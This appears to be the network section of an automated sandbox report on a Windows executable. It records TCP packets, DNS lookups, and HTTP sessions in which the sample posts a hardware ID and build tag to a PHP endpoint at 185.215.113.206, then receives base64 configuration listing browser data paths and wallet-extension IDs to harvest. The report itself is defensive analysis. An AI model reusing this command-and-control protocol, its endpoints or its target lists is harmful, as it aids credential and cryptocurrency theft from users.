Dec 7, 2024 10:52:02.391324997 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.391335964 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.391371965 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.392294884 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.392340899 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.392359972 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.392398119 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.393349886 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.393400908 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.393425941 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.393471956 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.394427061 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.394525051 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.394568920 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.395488024 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.395567894 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.395764112 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.396573067 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.396621943 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.396694899 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.396840096 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.397557974 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.397619009 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.397700071 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.397749901 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.398648024 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.398724079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.398854971 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.398905039 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.399693966 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.399744034 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.399758101 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.399796963 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.400791883 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.400842905 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.400914907 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.400963068 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.401777029 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.401823044 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.442192078 CET	443	49857	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.442764044 CET	443	49856	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.442766905 CET	49857	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.442807913 CET	443	49857	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.443113089 CET	49856	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.443129063 CET	443	49856	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.443285942 CET	49857	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.443293095 CET	443	49857	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.443593025 CET	49856	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.443597078 CET	443	49856	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.538642883 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.538714886 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.538937092 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.538990021 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.539170980 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.539329052 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.539351940 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.539401054 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.540214062 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.540265083 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.540333033 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.540527105 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.541284084 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.541351080 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.541462898 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.541532040 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.542299986 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.542361021 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.542408943 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.542459011 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.543366909 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.543457031 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.543464899 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.543694973 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.544433117 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.544486046 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.544508934 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.544564962 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.545507908 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.545564890 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.545608044 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.545651913 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.546552896 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.546616077 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.546643972 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.546689987 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.547584057 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.547650099 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.547696114 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.547822952 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.548665047 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.548779011 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.548784971 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.548820019 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.549740076 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.549791098 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.549810886 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.549859047 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.550791025 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.550825119 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.550883055 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.551837921 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.551892996 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.551965952 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.552025080 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.552891970 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.552961111 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.553009033 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.553056002 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.553947926 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.554001093 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.554059982 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.554173946 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.555058002 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.555111885 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.555140018 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.555187941 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.556061029 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.556106091 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.556114912 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.556159973 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.557112932 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.557167053 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.557243109 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.557285070 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.558162928 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.558211088 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.558259964 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.558304071 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.559264898 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.559295893 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.559320927 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.559330940 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.560272932 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.560327053 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.560446978 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.560494900 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.561331987 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.561393976 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.561456919 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.561501026 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.562380075 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.562437057 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.562513113 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.562560081 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.563421965 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.563471079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.563528061 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.563585043 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.564493895 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.564546108 CET	49852	80	192.168.2.6	185.215.113.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 7, 2024 10:51:20.378216028 CET	192.168.2.6	1.1.1.1	0x5cf7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:20.378356934 CET	192.168.2.6	1.1.1.1	0x6072	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 7, 2024 10:51:27.275058031 CET	192.168.2.6	1.1.1.1	0x773d	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:27.275330067 CET	192.168.2.6	1.1.1.1	0xb847	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 7, 2024 10:51:27.292685986 CET	192.168.2.6	1.1.1.1	0xefb9	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:27.293035984 CET	192.168.2.6	1.1.1.1	0x3ea1	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 7, 2024 10:51:28.267055035 CET	192.168.2.6	1.1.1.1	0xd80e	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:28.267335892 CET	192.168.2.6	1.1.1.1	0xab6b	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 7, 2024 10:51:20.515566111 CET	1.1.1.1	192.168.2.6	0x6072	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 7, 2024 10:51:20.515578032 CET	1.1.1.1	192.168.2.6	0x5cf7	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:27.415330887 CET	1.1.1.1	192.168.2.6	0xb847	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 10:51:27.415344954 CET	1.1.1.1	192.168.2.6	0x773d	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 10:51:27.415344954 CET	1.1.1.1	192.168.2.6	0x773d	No error (0)	www3.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:27.430145025 CET	1.1.1.1	192.168.2.6	0x3ea1	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 10:51:27.430413008 CET	1.1.1.1	192.168.2.6	0xefb9	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 10:51:27.430413008 CET	1.1.1.1	192.168.2.6	0xefb9	No error (0)	plus.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 7, 2024 10:51:28.404000998 CET	1.1.1.1	192.168.2.6	0xd80e	No error (0)	play.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	185.215.113.206	80	7484	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:51:11.974153042 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 10:51:13.315779924 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:13.349231005 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFC Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 34 46 32 39 30 38 36 36 30 37 34 31 37 30 30 36 36 32 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="hwid"3B4F29086607417006623------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="build"drum------CAAEBKEGHJKEBFHJDBFC--
Dec 7, 2024 10:51:13.806977034 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 47 51 7a 4e 6a 68 69 4d 6d 46 68 59 6d 45 30 59 7a 6b 35 59 7a 63 32 59 32 4d 77 5a 44 5a 6d 4d 44 49 32 4e 32 59 32 4d 54 52 6d 4d 44 49 79 4d 6a 64 6c 4e 7a 56 6b 4d 54 42 6c 4d 57 52 68 59 57 55 33 4f 54 67 32 4d 6d 5a 68 4d 47 46 69 4f 47 56 68 4e 57 46 6c 4d 6a 63 30 59 57 59 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NGQzNjhiMmFhYmE0Yzk5Yzc2Y2MwZDZmMDI2N2Y2MTRmMDIyMjdlNzVkMTBlMWRhYWU3OTg2MmZhMGFiOGVhNWFlMjc0YWY1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 7, 2024 10:51:13.808861971 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"browsers------DAKFIDHDGIEGCAKFIIJK--
Dec 7, 2024 10:51:14.254066944 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 7, 2024 10:51:14.254101038 CET	124	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdT
Dec 7, 2024 10:51:14.445992947 CET	896	IN	Data Raw: 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 78 44 61 47 56 6b 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46 Data Ascii: dGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHB
Dec 7, 2024 10:51:14.447406054 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJK Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"plugins------HDAFBAEBKJKFIDHJJKJK--
Dec 7, 2024 10:51:14.892465115 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 